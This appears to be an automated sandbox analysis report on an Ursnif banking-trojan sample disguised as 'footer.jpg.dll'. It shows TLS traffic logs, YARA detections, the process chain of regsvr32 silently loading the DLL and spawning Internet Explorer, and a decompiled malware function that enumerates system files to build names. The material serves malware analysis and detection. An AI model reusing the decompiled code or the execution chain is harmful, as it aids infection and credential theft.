                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:05.064755917 CET151.101.1.44443192.168.2.449770CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                          CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:05.065037966 CET151.101.1.44443192.168.2.449768CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                          CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:05.065707922 CET151.101.1.44443192.168.2.449772CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                          CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:05.065821886 CET151.101.1.44443192.168.2.449769CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                          CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                                                                          Feb 10, 2021 08:00:05.067105055 CET151.101.1.44443192.168.2.449771CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                                                                          CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030

                                                                                                                                                                                                                                                          Code Manipulations

                                                                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Start time:07:59:56
                                                                                                                                                                                                                                                          Start date:10/02/2021
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:loaddll32.exe 'C:\Users\user\Desktop\footer.jpg.dll'
                                                                                                                                                                                                                                                          Imagebase:0xdb0000
                                                                                                                                                                                                                                                          File size:121856 bytes
                                                                                                                                                                                                                                                          MD5 hash:99D621E00EFC0B8F396F38D5555EB078
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:moderate

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Start time:07:59:56
                                                                                                                                                                                                                                                          Start date:10/02/2021
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:regsvr32.exe /s C:\Users\user\Desktop\footer.jpg.dll
                                                                                                                                                                                                                                                          Imagebase:0x1180000
                                                                                                                                                                                                                                                          File size:20992 bytes
                                                                                                                                                                                                                                                          MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.735284219.0000000005258000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.735314560.0000000005258000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.735145270.0000000005258000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.735337124.0000000005258000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.735348930.0000000005258000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.735180520.0000000005258000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000002.1037755349.0000000005258000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.735370244.0000000005258000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.735214761.0000000005258000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Start time:07:59:57
                                                                                                                                                                                                                                                          Start date:10/02/2021
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
                                                                                                                                                                                                                                                          Imagebase:0x11d0000
                                                                                                                                                                                                                                                          File size:232960 bytes
                                                                                                                                                                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Start time:07:59:57
                                                                                                                                                                                                                                                          Start date:10/02/2021
                                                                                                                                                                                                                                                          Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          Imagebase:0x7ff78b070000
                                                                                                                                                                                                                                                          File size:823560 bytes
                                                                                                                                                                                                                                                          MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Start time:07:59:57
                                                                                                                                                                                                                                                          Start date:10/02/2021
                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6808 CREDAT:17410 /prefetch:2
                                                                                                                                                                                                                                                          Imagebase:0xba0000
                                                                                                                                                                                                                                                          File size:822536 bytes
                                                                                                                                                                                                                                                          MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Start time:08:00:21
                                                                                                                                                                                                                                                          Start date:10/02/2021
                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6808 CREDAT:82962 /prefetch:2
                                                                                                                                                                                                                                                          Imagebase:0xba0000
                                                                                                                                                                                                                                                          File size:822536 bytes
                                                                                                                                                                                                                                                          MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Start time:08:00:58
                                                                                                                                                                                                                                                          Start date:10/02/2021
                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6808 CREDAT:82966 /prefetch:2
                                                                                                                                                                                                                                                          Imagebase:0xba0000
                                                                                                                                                                                                                                                          File size:822536 bytes
                                                                                                                                                                                                                                                          MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                                                                          Code Analysis

                                                                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                                            			E04877AA8(signed char* __eax, intOrPtr* _a4) {
                                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                            				CHAR* _v20;
                                                                                                                                                                                                                                                            				struct _FILETIME _v28;
                                                                                                                                                                                                                                                            				void* _v32;
                                                                                                                                                                                                                                                            				void* _v36;
                                                                                                                                                                                                                                                            				char* _v40;
                                                                                                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                                                                                                            				long _v344;
                                                                                                                                                                                                                                                            				struct _WIN32_FIND_DATAA _v368;
                                                                                                                                                                                                                                                            				signed int _t72;
                                                                                                                                                                                                                                                            				void* _t74;
                                                                                                                                                                                                                                                            				signed int _t76;
                                                                                                                                                                                                                                                            				void* _t78;
                                                                                                                                                                                                                                                            				intOrPtr _t81;
                                                                                                                                                                                                                                                            				CHAR* _t83;
                                                                                                                                                                                                                                                            				void* _t85;
                                                                                                                                                                                                                                                            				signed char _t89;
                                                                                                                                                                                                                                                            				signed char _t91;
                                                                                                                                                                                                                                                            				intOrPtr _t93;
                                                                                                                                                                                                                                                            				void* _t96;
                                                                                                                                                                                                                                                            				long _t99;
                                                                                                                                                                                                                                                            				int _t101;
                                                                                                                                                                                                                                                            				signed int _t109;
                                                                                                                                                                                                                                                            				char* _t111;
                                                                                                                                                                                                                                                            				void* _t113;
                                                                                                                                                                                                                                                            				int _t119;
                                                                                                                                                                                                                                                            				char _t128;
                                                                                                                                                                                                                                                            				void* _t134;
                                                                                                                                                                                                                                                            				signed int _t136;
                                                                                                                                                                                                                                                            				char* _t139;
                                                                                                                                                                                                                                                            				signed int _t140;
                                                                                                                                                                                                                                                            				char* _t141;
                                                                                                                                                                                                                                                            				char* _t146;
                                                                                                                                                                                                                                                            				signed char* _t148;
                                                                                                                                                                                                                                                            				int _t151;
                                                                                                                                                                                                                                                            				void* _t152;
                                                                                                                                                                                                                                                            				void* _t153;
                                                                                                                                                                                                                                                            				void* _t154;
                                                                                                                                                                                                                                                            				void* _t165;
                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                            				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                                            				_t148 = __eax;
                                                                                                                                                                                                                                                            				_t72 =  *0x487d278; // 0x63699bc3
                                                                                                                                                                                                                                                            				_t74 = RtlAllocateHeap( *0x487d238, 0, _t72 ^ 0x63699ac7);
                                                                                                                                                                                                                                                            				_v20 = _t74;
                                                                                                                                                                                                                                                            				if(_t74 == 0) {
                                                                                                                                                                                                                                                            					L36:
                                                                                                                                                                                                                                                            					return _v12;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t76 =  *0x487d278; // 0x63699bc3
                                                                                                                                                                                                                                                            				_t78 = RtlAllocateHeap( *0x487d238, 0, _t76 ^ 0x63699bce);
                                                                                                                                                                                                                                                            				_t146 = 0;
                                                                                                                                                                                                                                                            				_v36 = _t78;
                                                                                                                                                                                                                                                            				if(_t78 == 0) {
                                                                                                                                                                                                                                                            					L35:
                                                                                                                                                                                                                                                            					HeapFree( *0x487d238, _t146, _v20);
                                                                                                                                                                                                                                                            					goto L36;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t136 =  *0x487d278; // 0x63699bc3
                                                                                                                                                                                                                                                            				memset(_t78, 0, _t136 ^ 0x63699bce);
                                                                                                                                                                                                                                                            				_t81 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            				_t154 = _t153 + 0xc;
                                                                                                                                                                                                                                                            				_t5 = _t81 + 0x487e7f2; // 0x73797325
                                                                                                                                                                                                                                                            				_t83 = E04874400(_t5);
                                                                                                                                                                                                                                                            				_v20 = _t83;
                                                                                                                                                                                                                                                            				if(_t83 == 0) {
                                                                                                                                                                                                                                                            					L34:
                                                                                                                                                                                                                                                            					HeapFree( *0x487d238, _t146, _v36);
                                                                                                                                                                                                                                                            					goto L35;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t134 = 0xffffffffffffffff;
                                                                                                                                                                                                                                                            				_v28.dwLowDateTime = 0x63699bce;
                                                                                                                                                                                                                                                            				_v28.dwHighDateTime = 0x63699bce;
                                                                                                                                                                                                                                                            				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                                                            				_v32 = _t85;
                                                                                                                                                                                                                                                            				if(_t85 != 0x63699bce) {
                                                                                                                                                                                                                                                            					GetFileTime(_t85,  &_v28, 0, 0);
                                                                                                                                                                                                                                                            					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
                                                                                                                                                                                                                                                            					asm("adc dword [ebp-0x14], 0xc9"); // executed
                                                                                                                                                                                                                                                            					FindCloseChangeNotification(_v32); // executed
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
                                                                                                                                                                                                                                                            				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
                                                                                                                                                                                                                                                            				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
                                                                                                                                                                                                                                                            				 *_t148 = _t91;
                                                                                                                                                                                                                                                            				_v32 = _t91 & 0x000000ff;
                                                                                                                                                                                                                                                            				_t93 =  *0x487d27c; // 0x9da5a8
                                                                                                                                                                                                                                                            				_t16 = _t93 + 0x487e813; // 0x642e2a5c
                                                                                                                                                                                                                                                            				_v40 = _t146;
                                                                                                                                                                                                                                                            				_v44 = _t89 & 0x000000ff;
                                                                                                                                                                                                                                                            				__imp__(_v20, _t16);
                                                                                                                                                                                                                                                            				_t96 = FindFirstFileA(_v20,  &_v368); // executed
                                                                                                                                                                                                                                                            				_v16 = _t96;
                                                                                                                                                                                                                                                            				if(_t96 == _t134) {
                                                                                                                                                                                                                                                            					_t146 = 0;
                                                                                                                                                                                                                                                            					goto L34;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                                                                                                                                                                                                                                            				while(_t99 > 0) {
                                                                                                                                                                                                                                                            					_t101 = FindNextFileA(_v16,  &_v368); // executed
                                                                                                                                                                                                                                                            					if(_t101 == 0) {
                                                                                                                                                                                                                                                            						FindClose(_v16);
                                                                                                                                                                                                                                                            						_v16 = FindFirstFileA(_v20,  &_v368);
                                                                                                                                                                                                                                                            						_v28.dwHighDateTime = _v344;
                                                                                                                                                                                                                                                            						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                                            					_t109 = _v44;
                                                                                                                                                                                                                                                            					if(_v12 <= _t109) {
                                                                                                                                                                                                                                                            						goto L15;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					_t140 = _v12;
                                                                                                                                                                                                                                                            					if(_t140 > _v32) {
                                                                                                                                                                                                                                                            						_t141 = _v36;
                                                                                                                                                                                                                                                            						 *_a4 = _t141;
                                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                                            							_t128 =  *_t141;
                                                                                                                                                                                                                                                            							if(_t128 == 0) {
                                                                                                                                                                                                                                                            								break;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							if(_t128 < 0x30) {
                                                                                                                                                                                                                                                            								 *_t141 = _t128 + 0x20;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            							_t141 = _t141 + 1;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						_v12 = 1;
                                                                                                                                                                                                                                                            						FindClose(_v16); // executed
                                                                                                                                                                                                                                                            						_t146 = 0;
                                                                                                                                                                                                                                                            						goto L35;
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					_t165 = _t140 - _t109;
                                                                                                                                                                                                                                                            					L15:
                                                                                                                                                                                                                                                            					if(_t165 == 0 || _v12 == _v32) {
                                                                                                                                                                                                                                                            						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
                                                                                                                                                                                                                                                            						_t139 = _v40;
                                                                                                                                                                                                                                                            						_t151 = _t111 -  &(_v368.cFileName);
                                                                                                                                                                                                                                                            						_t113 = 0;
                                                                                                                                                                                                                                                            						if(_t139 != 0) {
                                                                                                                                                                                                                                                            							_t48 = _t151 - 4; // -4
                                                                                                                                                                                                                                                            							_t113 = _t48;
                                                                                                                                                                                                                                                            							if(_t113 > _t151) {
                                                                                                                                                                                                                                                            								_t113 = 0;
                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						if(_t151 > 4) {
                                                                                                                                                                                                                                                            							_t151 = 4;
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
                                                                                                                                                                                                                                                            						_t154 = _t154 + 0xc;
                                                                                                                                                                                                                                                            						_v40 =  &(_v40[_t151]);
                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                                            						_t119 = FindNextFileA(_v16,  &_v368); // executed
                                                                                                                                                                                                                                                            						if(_t119 == 0) {
                                                                                                                                                                                                                                                            							FindClose(_v16);
                                                                                                                                                                                                                                                            							_v16 = FindFirstFileA(_v20,  &_v368);
                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                            					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
                                                                                                                                                                                                                                                            					_v12 = _v12 + 1;
                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                            			}











































                                                                                                                                                                                                                                                            0x04877ab1
                                                                                                                                                                                                                                                            0x04877ab7
                                                                                                                                                                                                                                                            0x04877ab9
                                                                                                                                                                                                                                                            0x04877ad3
                                                                                                                                                                                                                                                            0x04877ad7
                                                                                                                                                                                                                                                            0x04877ada
                                                                                                                                                                                                                                                            0x04877d4f
                                                                                                                                                                                                                                                            0x04877d56
                                                                                                                                                                                                                                                            0x04877d56
                                                                                                                                                                                                                                                            0x04877ae0
                                                                                                                                                                                                                                                            0x04877af5
                                                                                                                                                                                                                                                            0x04877af7
                                                                                                                                                                                                                                                            0x04877afb
                                                                                                                                                                                                                                                            0x04877afe
                                                                                                                                                                                                                                                            0x04877d3f
                                                                                                                                                                                                                                                            0x04877d49
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04877d49
                                                                                                                                                                                                                                                            0x04877b04
                                                                                                                                                                                                                                                            0x04877b0f
                                                                                                                                                                                                                                                            0x04877b14
                                                                                                                                                                                                                                                            0x04877b19
                                                                                                                                                                                                                                                            0x04877b1c
                                                                                                                                                                                                                                                            0x04877b23
                                                                                                                                                                                                                                                            0x04877b2a
                                                                                                                                                                                                                                                            0x04877b2d
                                                                                                                                                                                                                                                            0x04877d2f
                                                                                                                                                                                                                                                            0x04877d39
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04877d39
                                                                                                                                                                                                                                                            0x04877b43
                                                                                                                                                                                                                                                            0x04877b47
                                                                                                                                                                                                                                                            0x04877b4a
                                                                                                                                                                                                                                                            0x04877b4d
                                                                                                                                                                                                                                                            0x04877b55
                                                                                                                                                                                                                                                            0x04877b58
                                                                                                                                                                                                                                                            0x04877b61
                                                                                                                                                                                                                                                            0x04877b67
                                                                                                                                                                                                                                                            0x04877b71
                                                                                                                                                                                                                                                            0x04877b78
                                                                                                                                                                                                                                                            0x04877b78
                                                                                                                                                                                                                                                            0x04877b8a
                                                                                                                                                                                                                                                            0x04877b95
                                                                                                                                                                                                                                                            0x04877ba3
                                                                                                                                                                                                                                                            0x04877ba8
                                                                                                                                                                                                                                                            0x04877bad
                                                                                                                                                                                                                                                            0x04877bb0
                                                                                                                                                                                                                                                            0x04877bb5
                                                                                                                                                                                                                                                            0x04877bbf
                                                                                                                                                                                                                                                            0x04877bc2
                                                                                                                                                                                                                                                            0x04877bc5
                                                                                                                                                                                                                                                            0x04877bdb
                                                                                                                                                                                                                                                            0x04877bdf
                                                                                                                                                                                                                                                            0x04877be2
                                                                                                                                                                                                                                                            0x04877d2d
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04877d2d
                                                                                                                                                                                                                                                            0x04877bf9
                                                                                                                                                                                                                                                            0x04877c4a
                                                                                                                                                                                                                                                            0x04877c0d
                                                                                                                                                                                                                                                            0x04877c15
                                                                                                                                                                                                                                                            0x04877c1a
                                                                                                                                                                                                                                                            0x04877c28
                                                                                                                                                                                                                                                            0x04877c31
                                                                                                                                                                                                                                                            0x04877c3a
                                                                                                                                                                                                                                                            0x04877c3a
                                                                                                                                                                                                                                                            0x04877c48
                                                                                                                                                                                                                                                            0x04877c48
                                                                                                                                                                                                                                                            0x04877c4e
                                                                                                                                                                                                                                                            0x04877c52
                                                                                                                                                                                                                                                            0x04877c52
                                                                                                                                                                                                                                                            0x04877c58
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04877c5a
                                                                                                                                                                                                                                                            0x04877c60
                                                                                                                                                                                                                                                            0x04877d07
                                                                                                                                                                                                                                                            0x04877d0a
                                                                                                                                                                                                                                                            0x04877d17
                                                                                                                                                                                                                                                            0x04877d17
                                                                                                                                                                                                                                                            0x04877d1b
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04877d10
                                                                                                                                                                                                                                                            0x04877d14
                                                                                                                                                                                                                                                            0x04877d14
                                                                                                                                                                                                                                                            0x04877d16
                                                                                                                                                                                                                                                            0x04877d16
                                                                                                                                                                                                                                                            0x04877d20
                                                                                                                                                                                                                                                            0x04877d27
                                                                                                                                                                                                                                                            0x04877d29
                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                            0x04877d29
                                                                                                                                                                                                                                                            0x04877c66
                                                                                                                                                                                                                                                            0x04877c68
                                                                                                                                                                                                                                                            0x04877c68
                                                                                                                                                                                                                                                            0x04877c7b
                                                                                                                                                                                                                                                            0x04877c81
                                                                                                                                                                                                                                                            0x04877c8c
                                                                                                                                                                                                                                                            0x04877c8e
                                                                                                                                                                                                                                                            0x04877c92
                                                                                                                                                                                                                                                            0x04877c94
                                                                                                                                                                                                                                                            0x04877c94
                                                                                                                                                                                                                                                            0x04877c99
                                                                                                                                                                                                                                                            0x04877c9b
                                                                                                                                                                                                                                                            0x04877c9b
                                                                                                                                                                                                                                                            0x04877c99
                                                                                                                                                                                                                                                            0x04877ca0
                                                                                                                                                                                                                                                            0x04877ca4
                                                                                                                                                                                                                                                            0x04877ca4
                                                                                                                                                                                                                                                            0x04877cb4
                                                                                                                                                                                                                                                            0x04877cb9
                                                                                                                                                                                                                                                            0x04877cbc
                                                                                                                                                                                                                                                            0x04877cbc
                                                                                                                                                                                                                                                            0x04877cbf
                                                                                                                                                                                                                                                            0x04877cc9
                                                                                                                                                                                                                                                            0x04877cd1
                                                                                                                                                                                                                                                            0x04877cd6
                                                                                                                                                                                                                                                            0x04877ce4
                                                                                                                                                                                                                                                            0x04877ce4
                                                                                                                                                                                                                                                            0x04877cf8
                                                                                                                                                                                                                                                            0x04877cfc
                                                                                                                                                                                                                                                            0x04877cfc

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 04877AD3
                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 04877AF5
                                                                                                                                                                                                                                                            • memset.NTDLL ref: 04877B0F
                                                                                                                                                                                                                                                              • Part of subcall function 04874400: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,048791A4,63699BCE,04877B28,73797325), ref: 04874411
